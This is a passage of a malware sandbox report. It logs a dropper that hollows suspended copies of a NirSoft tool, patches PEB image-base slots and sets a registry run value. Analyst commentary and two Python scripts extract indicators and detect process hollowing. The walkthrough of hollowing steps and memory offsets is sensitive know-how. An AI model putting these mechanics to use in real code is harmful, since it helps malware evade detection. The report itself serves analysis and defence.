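USER_WRITABLE = ("\\programdata\\", "\\appdata\\")


def is_placeholder(row):
    """True for the create-time record: printed size 0 and empty-input digests."""
    _, size_kb, md5, sha1, sha256 = row
    return size_kb == 0 and (md5, sha1, sha256) == EMPTY


def final_artifacts(rows):
    """Last non-placeholder record per path, report order kept. A path that
    only ever appears as a placeholder is kept too, so nothing is dropped."""
    final = OrderedDict()
    for row in rows:
        path = row[0].lower()
        if path not in final or not is_placeholder(row):
            final[path] = row
    return final


def tags_for(path):
    tags = set()
    if path.endswith(".exe"):
        tags.add("executable")
    if any(d in path for d in USER_WRITABLE):
        tags.add("user-writable")
    if "\\temp\\" in path and path.endswith(".tmp"):
        tags.add("tempfile")
    return tags


def kb_matches(size_kb, nbytes):
    """Cross-check a printed 'x.xx KB' against a byte count from another table."""
    return round(nbytes / 1024, 2) == size_kb


def indicators(rows):
    out = []
    for path, row in final_artifacts(rows).items():
        _, size_kb, md5, sha1, sha256 = row
        out.append({"path": path, "size_kb": size_kb, "md5": md5, "sha1": sha1,
                    "sha256": sha256, "tags": tags_for(path),
                    "placeholder_only": is_placeholder(row)})
    return out


if __name__ == "__main__":
    for ind in indicators(CREATED_FILES):
        print(ind["sha256"], ind["path"], sorted(ind["tags"]))
```

Running it yields five indicators, none of them a placeholder; the executable under ProgramData is the only one tagged both executable and user-writable.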
Host Behavior
File (22)
Operation | Filename | Additional Information | Success | Count | Logfile
Create | C:\ProgramData\oyvGkGw.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL | True | 1 | Fn
Create | C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ | True | 1 | Fn
Create | C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ | True | 1 | Fn
Create | C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ | True | 1 | Fn
Create Temp File | C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp | path = C:\Users\kFT6uTQW\AppData\Local\Temp\ | True | 1 | Fn
Create Temp File | C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp | path = C:\Users\kFT6uTQW\AppData\Local\Temp\ | True | 1 | Fn
Create Temp File | C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp | path = C:\Users\kFT6uTQW\AppData\Local\Temp\ | True | 1 | Fn
Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp | type = size | True | 1 | Fn
Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp | type = size | True | 1 | Fn
Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp | type = size | True | 1 | Fn
Open | STD_INPUT_HANDLE | - | True | 1 | Fn
Open | STD_OUTPUT_HANDLE | - | True | 1 | Fn
Open | STD_ERROR_HANDLE | - | True | 1 | Fn
Copy | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe | source_filename = C:\Windows\system32\alg.exe | True | 1 | Fn
Write | C:\ProgramData\oyvGkGw.exe | size = 335922 | True | 1 | Fn, Data
Write | - | size = 335922 | True | 1 | Fn, Data
Delete | C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp | - | True | 1 | Fn
Delete | C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp | - | True | 2 | Fn
Delete | C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp | - | True | 2 | Fn
Delete | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe | - | True | 1 | Fn
Registry (1)
Operation | Key | Additional Information | Success | Count | Logfile
Write Value | - | value_name = syncpack, data = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe", size = 130, type = REG_SZ | True | 1 | Fn
Process (9)
Operation | Process | Additional Information | Success | Count | Logfile
Create | C:\ProgramData\oyvGkGw.exe | os_pid = 0x64, show_window = SW_HIDE | True | 1 | Fn
Create | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" | os_pid = 0x4f4, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE | True | 1 | Fn
Create | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | os_pid = 0x8a0, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE | True | 1 | Fn
Create | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" | os_pid = 0x728, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE | True | 1 | Fn
Create | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | os_pid = 0x834, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE | True | 1 | Fn
Terminate | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | exit_code = 0 | False | 1 | Fn
Terminate | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | exit_code = 0 | False | 1 | Fn
Terminate | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" | exit_code = 0 | False | 1 | Fn
Terminate | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" | exit_code = 0 | False | 1 | Fn
Every syncpack child is started CREATE_SUSPENDED and hidden, the precondition for the memory writes and thread-context changes logged below. /scomma <file> is the NirSoft command-line switch for writing a tool's results as a comma-separated file; the three D3xx.tmp paths are those output files, which the parent creates, reads back after the child runs, and deletes (File above).
Thread (12)
Operation | Process | Additional Information | Success | Count | Logfile
Get Context | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x878 | True | 1 | Fn
Get Context | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x86c | True | 1 | Fn
Get Context | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x868 | True | 1 | Fn
Get Context | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x86c | True | 1 | Fn
Set Context | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x878 | True | 1 | Fn
Set Context | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x86c | True | 1 | Fn
Set Context | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x868 | True | 1 | Fn
Set Context | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x86c | True | 1 | Fn
Resume | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x878 | True | 1 | Fn
Resume | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x86c | True | 1 | Fn
Resume | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x868 | True | 1 | Fn
Resume | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe | os_tid = 0x86c | True | 1 | Fn
Memory (21)
Operation | Process | Additional Information | Success | Count | Logfile
Allocate | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 | True | 1 | Fn
Allocate | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 | True | 1 | Fn
Allocate | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | address = 0x2d7f898, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 47708320 | True | 1 | Fn
Get Info | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" | address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 | True | 1 | Fn
Get Info | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 | True | 1 | Fn
Get Info | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" | address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 | True | 1 | Fn
Get Info | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | address = 0x40000000, protection_out = PAGE_READWRITE, PAGE_EXECUTE_READWRITE, size_out = 0 | True | 1 | Fn
Protect | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" | address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 114688 | False | 1 | Fn
Protect | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 102400 | True | 1 | Fn
Protect | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" | address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 372736 | False | 1 | Fn
Write | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" | address = 0x400000, size = 114688 | True | 1 | Fn, Data
Write | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" | address = 0x7efde008, size = 4 | True | 1 | Fn, Data
Write | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" | address = 0x7efdf010, size = 4 | True | 1 | Fn, Data
Write | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | address = 0x400000, size = 102400 | True | 1 | Fn, Data
Write | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | address = 0x7efde008, size = 4 | True | 1 | Fn, Data
Write | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | address = 0x7efdf010, size = 4 | True | 1 | Fn, Data
Write | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" | address = 0x400000, size = 372736 | True | 1 | Fn, Data
Write | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" | address = 0x7efde008, size = 4 | True | 1 | Fn, Data
Write | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" | address = 0x7efdf010, size = 4 | True | 1 | Fn, Data
Write | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | address = 0x140000000, size = 126976 | True | 1 | Fn, Data
Write | "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" | address = 0x7fffffd8010, size = 8 | True | 1 | Fn, Data
Reading the rows together: each suspended syncpack child gets RWX memory at 0x400000, an image-sized Write there (0x140000000 for the 64-bit syncpack_.exe, a copy of alg.exe), and then pointer-sized Writes at page offsets 0x8 and 0x10. Those are the ImageBaseAddress slots of a 32-bit and a 64-bit PEB; a WoW64 process on Windows 7 carries both (0x7efde000 and 0x7efdf000 here), and the native x64 target gets the 8-byte write at 0x7fffffd8010. With the Set Context and Resume calls in the Thread table this is process hollowing. The allocation_type = MEM_RESET_UNDO on the Get Info rows is the monitor decoding a VirtualQuery Type field of 0x1000000 with the allocation-flag names; in the Type field that value is MEM_IMAGE, i.e. the original image mapping (read-only header page) was still present at 0x400000 when queried, before it was overwritten.
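An added example, not part of the VMRay report: the Python below scores process-hollowing evidence from rows of the Process, Thread and Memory tables above (transcribed by hand, with one Set Context / Resume pair standing in for the twelve Thread rows). The only external facts it relies on are the PEB layouts, ImageBaseAddress at +0x8 of a 32-bit PEB and +0x10 of a 64-bit PEB; the indicator names and the verdict rule are this example's own.

```python
"""Score process-hollowing evidence in sandbox Process/Thread/Memory rows.

Added example, not part of the VMRay report. ROWS is transcribed from the
Process, Thread and Memory tables of this report (one Set Context / Resume
pair stands in for the twelve Thread rows). Two Windows layout facts are
used: PEB.ImageBaseAddress is at +0x8 in a 32-bit PEB and at +0x10 in a
64-bit PEB. Indicator names and the verdict rule are this example's own.
"""
import re

SP = r"C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
SP64 = r"C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe"
TMP = r"C:\Users\kFT6uTQW\AppData\Local\Temp"
T1 = rf'"{SP}" /scomma "{TMP}\D3A3.tmp"'
T2 = rf'"{SP}" "{TMP}\D3D3.tmp"'
T3 = rf'"{SP}" /scomma "{TMP}\D3D4.tmp"'
T4 = rf'"{SP64}" "{TMP}\D3D3.tmp"'
SUSP = "creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE"

# (table, operation, process column, additional information), as logged
ROWS = [
    ("process", "Create", r"C:\ProgramData\oyvGkGw.exe", "os_pid = 0x64, show_window = SW_HIDE"),
    ("process", "Create", T1, "os_pid = 0x4f4, " + SUSP),
    ("process", "Create", T2, "os_pid = 0x8a0, " + SUSP),
    ("process", "Create", T3, "os_pid = 0x728, " + SUSP),
    ("process", "Create", T4, "os_pid = 0x834, " + SUSP),
    ("thread", "Set Context", SP.lower(), "os_tid = 0x878"),
    ("thread", "Resume", SP.lower(), "os_tid = 0x878"),
    ("memory", "Allocate", T1, "address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688"),
    ("memory", "Allocate", T4, "address = 0x2d7f898, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 47708320"),
    ("memory", "Protect", T2, "address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 102400"),
    ("memory", "Write", T1, "address = 0x400000, size = 114688"),
    ("memory", "Write", T1, "address = 0x7efde008, size = 4"),
    ("memory", "Write", T1, "address = 0x7efdf010, size = 4"),
    ("memory", "Write", T2, "address = 0x400000, size = 102400"),
    ("memory", "Write", T4, "address = 0x140000000, size = 126976"),
    ("memory", "Write", T4, "address = 0x7fffffd8010, size = 8"),
]

PEB_IMAGEBASE_OFFSETS = (0x8, 0x10)  # 32-bit PEB, 64-bit PEB


def image_of(proc_col):
    """Key rows by target image path: the first quoted token of a command
    line, or the whole value when the log gives a bare (lower-case) path."""
    m = re.match(r'\s*"([^"]+)"', proc_col)
    return (m.group(1) if m else proc_col.strip()).lower()


def kv(info):
    """Parse 'a = 1, b = X, Y, c = 2' into a dict; flag lists keep their commas."""
    out = {}
    for part in re.split(r",\s*(?=\w+ = )", info):
        if " = " in part:
            k, v = part.split(" = ", 1)
            out[k.strip()] = v.strip()
    return out


def peb_imagebase_patch(addr, size):
    """Pointer-sized write at page offset 0x8 or 0x10: the ImageBaseAddress
    slot of a 32-bit or 64-bit PEB. A WoW64 target gets both (4 bytes each);
    a native x64 target gets 8 bytes at +0x10."""
    return size in (4, 8) and (addr & 0xFFF) in PEB_IMAGEBASE_OFFSETS


def assess(rows):
    """Per target image: indicator set, PEB writes, and a hollowing verdict."""
    per = {}
    for table, op, proc, info in rows:
        ev = per.setdefault(image_of(proc), {"indicators": set(), "peb_writes": []})
        f = kv(info)
        if table == "process" and op == "Create" and "CREATE_SUSPENDED" in f.get("creation_flags", ""):
            ev["indicators"].add("suspended_create")
        elif table == "thread" and op == "Set Context":
            ev["indicators"].add("context_hijack")
        elif table == "thread" and op == "Resume":
            ev["indicators"].add("resume")
        elif table == "memory" and op in ("Allocate", "Protect") and "PAGE_EXECUTE_READWRITE" in f.get("protection", ""):
            ev["indicators"].add("rwx_memory")
        elif table == "memory" and op == "Write":
            addr, size = int(f["address"], 0), int(f["size"], 0)
            if peb_imagebase_patch(addr, size):
                ev["indicators"].add("peb_patch")
                ev["peb_writes"].append((addr, size))
            elif size >= 0x1000:  # at least a page: an image or section body
                ev["indicators"].add("image_write")
    for ev in per.values():
        i = ev["indicators"]
        # Hollowing: suspended child, image body written, and either the PEB
        # image-base swap or a hijacked-then-resumed thread.
        ev["hollowing"] = ("suspended_create" in i and "image_write" in i
                           and ("peb_patch" in i or {"context_hijack", "resume"} <= i))
    return per


if __name__ == "__main__":
    for image, ev in assess(ROWS).items():
        verdict = "HOLLOWING" if ev["hollowing"] else "ok"
        print(verdict, image, sorted(ev["indicators"]))
```

Keying on the image path rather than the full command line is what lets the Thread rows, which log only the bare lower-case path, land on the same target as the Process and Memory rows. Both syncpack images are flagged; oyvGkGw.exe, created without CREATE_SUSPENDED, is not.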
Module (96)
Operation | Module | Additional Information | Success | Count | Logfile
Load | USER32.dll | base_address = 0x771c0000 | True | 1 | Fn
Load | KERNEL32.dll | base_address = 0x75fb0000 | True | 1 | Fn
Load | advapi32.dll | base_address = 0x77740000 | True | 6 | Fn
Load | crypt32.dll | base_address = 0x76260000 | True | 6 | Fn
Load | wininet.dll | base_address = 0x772c0000 | True | 5 | Fn
Load | shell32.dll | base_address = 0x76480000 | True | 5 | Fn
Load | urlmon.dll | base_address = 0x75870000 | True | 4 | Fn
Load | userenv.dll | base_address = 0x75290000 | True | 3 | Fn
Load | wtsapi32.dll | base_address = 0x75420000 | True | 4 | Fn
Load | ws2_32.dll | base_address = 0x75af0000 | True | 1 | Fn
Load | mpr.dll | base_address = 0x750f0000 | True | 1 | Fn
Load | netapi32.dll | base_address = 0x750d0000 | True | 1 | Fn
Load | SAMCLI.DLL | base_address = 0x74de0000 | True | 1 | Fn
Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75fb0000 | True | 1 | Fn
Get Filename | - | process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 | True | 5 | Fn
Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c | True | 1 | Fn
Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c | True | 1 | Fn
Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 | True | 1 | Fn
Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 | True | 1 | Fn
Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 | True | 1 | Fn
Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 | True | 1 | Fn
Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x771eae5f | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77c0e026 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x76066aa8 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x75fc5a4b | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x75fdeceb | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x75fc110c | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75fc14e9 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75fc14c9 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75fc1809 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75fc11f8 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75fc4f2b | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75fc359f | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75fc1252 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75fc4208 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75fc4d28 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x7604410b | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x76044195 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75fcd31f | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75fdee7e | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77c2441c | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77c4c50e | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77c4c381 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75fdf088 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77c305d7 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77c4ca24 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c00b8c | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77cbfde8 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c51e1d | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x76044761 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7603cd11 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 | False | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7604424f | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x760446b1 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x76056676 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x76044751 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x760565f1 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x760447c1 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x760447e1 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x760447f1 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 | False | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75fdeee0 | True | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 | False | 1 | Fn
Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 | False | 1 | Fn
Create Mapping | C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp | filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, protection = PAGE_READONLY, maximum_size = 0 | True | 1 | Fn
Map | C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp | process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, desired_access = FILE_MAP_READ | True | 1 | Fn
The long run of kernel32 lookups from FlsAlloc through SetFileInformationByHandleW, including the four that fail with address_out = 0x0, is the Visual C++ runtime's start-up code probing for APIs newer than Windows 7; it is not malware behaviour and not an anti-analysis check. The rows worth reading are the lookups of VirtualAlloc, VirtualProtect, LoadLibraryA and GetProcAddress with no module given (a stage resolving its own imports before unpacking) and the loads of wininet, urlmon, crypt32, wtsapi32, userenv, netapi32, mpr and SAMCLI, which match the HTTP activity and the host enumeration logged below.
Service (1)
Operation | Additional Information | Success | Count | Logfile
Open Manager | database_name = SERVICES_ACTIVE_DATABASE | False | 1 | Fn
The service-control-manager open fails at the Medium integrity level this chain runs at; the persistence that did succeed in this run is the syncpack value written under Registry above (its key path is not captured in the log).
System (2038)
Operation | Additional Information | Success | Count | Logfile
Get Computer Name | result_out = XABNCPUWKW | True | 2 | Fn
Get Time | type = Ticks, time = 202504 | True | 61 | Fn
Get Time | type = Ticks, time = 202520 | True | 76 | Fn
Get Time | type = Ticks, time = 202536 | True | 112 | Fn
Get Time | type = Ticks, time = 206888 | True | 1 | Fn
Get Time | type = Ticks, time = 206904 | True | 13 | Fn
Get Time | type = Ticks, time = 206919 | True | 16 | Fn
Get Time | type = Ticks, time = 206935 | True | 76 | Fn
Get Time | type = Ticks, time = 206950 | True | 78 | Fn
Get Time | type = Ticks, time = 206966 | True | 76 | Fn
Get Time | type = Ticks, time = 206982 | True | 20 | Fn
Get Time | type = Ticks, time = 207060 | True | 17 | Fn
Get Time | type = Ticks, time = 207075 | True | 12 | Fn
Get Time | type = Ticks, time = 207091 | True | 20 | Fn
Get Time | type = Ticks, time = 207106 | True | 36 | Fn
Get Time | type = Ticks, time = 207122 | True | 108 | Fn
Get Time | type = Ticks, time = 207138 | True | 107 | Fn
Get Time | type = Ticks, time = 207403 | True | 1 | Fn
Get Time | type = Ticks, time = 219197 | True | 9 | Fn
Get Time | type = Ticks, time = 219212 | True | 13 | Fn
Get Time | type = Ticks, time = 219228 | True | 9 | Fn
Get Time | type = Ticks, time = 219243 | True | 9 | Fn
Get Time | type = Ticks, time = 219259 | True | 7 | Fn
Get Time | type = Ticks, time = 219275 | True | 6 | Fn
Get Time | type = Ticks, time = 219290 | True | 32 | Fn
Get Time | type = Ticks, time = 219306 | True | 32 | Fn
Get Time | type = Ticks, time = 219321 | True | 49 | Fn
Get Time | type = Ticks, time = 219337 | True | 70 | Fn
Get Time | type = Ticks, time = 219353 | True | 60 | Fn
Get Time | type = Ticks, time = 248603 | True | 1 | Fn
Get Time | type = Ticks, time = 248618 | True | 58 | Fn
Get Time | type = Ticks, time = 248634 | True | 120 | Fn
Get Time | type = Ticks, time = 248649 | True | 70 | Fn
Get Time | type = Ticks, time = 250771 | True | 1 | Fn
Get Time | type = Ticks, time = 250787 | True | 1 | Fn
Get Time | type = Ticks, time = 250802 | True | 1 | Fn
Get Time | type = Ticks, time = 250818 | True | 10 | Fn
Get Time | type = Ticks, time = 250834 | True | 1 | Fn
Get Time | type = System Time, time = 2018-06-25 14:54:22 (UTC) | True | 1 | Fn
Get Time | type = Ticks, time = 250865 | True | 4 | Fn
Get Time | type = Ticks, time = 250880 | True | 10 | Fn
Get Time | type = Ticks, time = 250896 | True | 10 | Fn
Get Time | type = Ticks, time = 250912 | True | 11 | Fn
